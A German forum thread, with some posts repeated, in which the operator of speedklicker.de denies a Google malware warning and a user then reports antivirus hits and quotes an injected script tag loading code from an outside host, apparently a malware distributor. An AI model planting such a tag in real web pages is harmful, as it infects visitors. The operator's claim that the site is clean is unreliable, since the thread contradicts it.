Closed

Ich bin mal eben hin zur Seite, um sie mir anzusehen. Dein Problem mit der gesperrten Seite ist weiterhin.

Zitat:
die wir in den letzten 90 Tagen getestet haben, wurde festgestellt, dass Malware (Schadsoftware) ohne Einwilligung des Nutzers heruntergeladen und installiert wurde. Der letzte Besuch von Google auf dieser Website war am 2010-07-31 und verdächtiger Content wurde auf dieser Website zuletzt am 2010-07-31 gefunden.

Hier nachzulesen

So wie es aussieht hat Dir jemand was auf die Page geschmuggelt

Ich bin mal eben hin zur Seite, um sie mir anzusehen. Dein Problem mit der gesperrten Seite ist weiterhin.

Zitat:
die wir in den letzten 90 Tagen getestet haben, wurde festgestellt, dass Malware (Schadsoftware) ohne Einwilligung des Nutzers heruntergeladen und installiert wurde. Der letzte Besuch von Google auf dieser Website war am 2010-07-31 und verdächtiger Content wurde auf dieser Website zuletzt am 2010-07-31 gefunden.

Hier nachzulesen

So wie es aussieht hat Dir jemand was auf die Page geschmuggelt

Die Seite ist seit Monaten wieder sauber. Alle User haben da keine Probleme mehr mit. Dann ist es bestimmt noch irgendwie in Deinem FF *festgefressen*.

Nimm doch mal einen anderen Browser, oder leere den FF anständig. Dann ist das Problem auch mit Sicherheit weg ;)

Und wenn Google einmal eine Seite auf dem Kieker hat, kommt man da auch so schnell nicht wieder raus, auch wenn sie wieder clean ist

Heute ist mal wieder eine grosse Teamrally gestartet, die 4 Wochen laufen wird.
Es können 10 Teams mit bis zu je 3 Usern gebildet werden und es gibt Gesamtgewinne von 500 Mio Losen zu gewinnen.

Teams bilden und wechseln könnt Ihr bis zum 06. 09. 2010 um 20 Uhr.
Also auch noch Zeit für User, die später noch einsteigen möchten.

Viel Spass

Die Seite ist seit Monaten wieder sauber. Alle User haben da keine Probleme mehr mit. Dann ist es bestimmt noch irgendwie in Deinem FF *festgefressen*.

Nimm doch mal einen anderen Browser, oder leere den FF anständig. Dann ist das Problem auch mit Sicherheit weg ;)

Und wenn Google einmal eine Seite auf dem Kieker hat, kommt man da auch so schnell nicht wieder raus, auch wenn sie wieder clean ist

Hallo!

Ich war ja selbst schon seit längerem auf SpeedKlicker.de nicht mehr aktiv, eben wegen FireFox' "attackierende Seite"-Warnung.
Seitdem habe ich mich auf anderen Seiten rum getrieben. Vor zwei Tagen habe ich dann wieder mal versucht mich bei SpeedKlicker.de einzuloggen. Aber immer noch das selbe :( Keine Chance mit FireFox auf die Seite zu kommen ("Als attackierend gemeldete Webseite!"). Nur wenn man die Sicherheitseinstellungen von FireFox teilweise deaktiviert kommt man auf die Seite. Deshalb hab ich's dann extra noch mit dem Internet-Explorer probiert, mit dem funktioniert die Seite auf den ersten Blick einwandfrei.

Die meisten Bereiche der Seite (Banner-klicken, usw.) funktionieren ohne Probleme. Aber als ich dann versuchte den Arthur Slot zu öffnen, ging es los: Der Virenscanner meldete "HTML/ScrInject.B.Gen Virus". Das selbe passiert bei fast allen unter "Games" verlinkten Seiten. Auch die "WMS" Unter-Seiten versuchen über diese HTML Script-Injection fremden Code auszuführen. Ein kurzer Blick in deinen HTML Code förderte folgendes zu Tage:
HTML:
<script src=https://symor.com/images/index.php ></script>
www.speedklicker.de versucht tatsächlich auf manchen (nicht allen) seiner Unter-Seiten ein fremdes Script von einem bekannten Verbreiter von Schadsoftware auszuführen!

Was mir dann noch aufgefallen ist: Die Seite https://demo.speedklicker.de/(welche auf www.speedklicker.de verlinkt ist) versucht über JavaScript einen Trojaner "JS/TrojanDownloader.HackLoad.AG" zu platzieren. Auch nicht sehr nett :ugly:

Wie man sieht, haben FireFox und Google nicht ganz so unrecht mit der Meldung ;)
Solange man mit einem guten Virenscanner surft ist das ja alles kein Problem. Aber sollte sich mal jemand ohne Virescanner (oh mann, solche Leute soll es ja tatsächlich immer noch geben) auf deine Seite verirren, könnte derjenige eventuell ein Problem bekommen ...

Die Säuberung sollte kein Problem sein, einfach die bösen <script> Tags entfernen ;)
Bei Fragen einfach melden, ich bin natürlich gerner bereit weiter zu helfen falls nötig.

MfG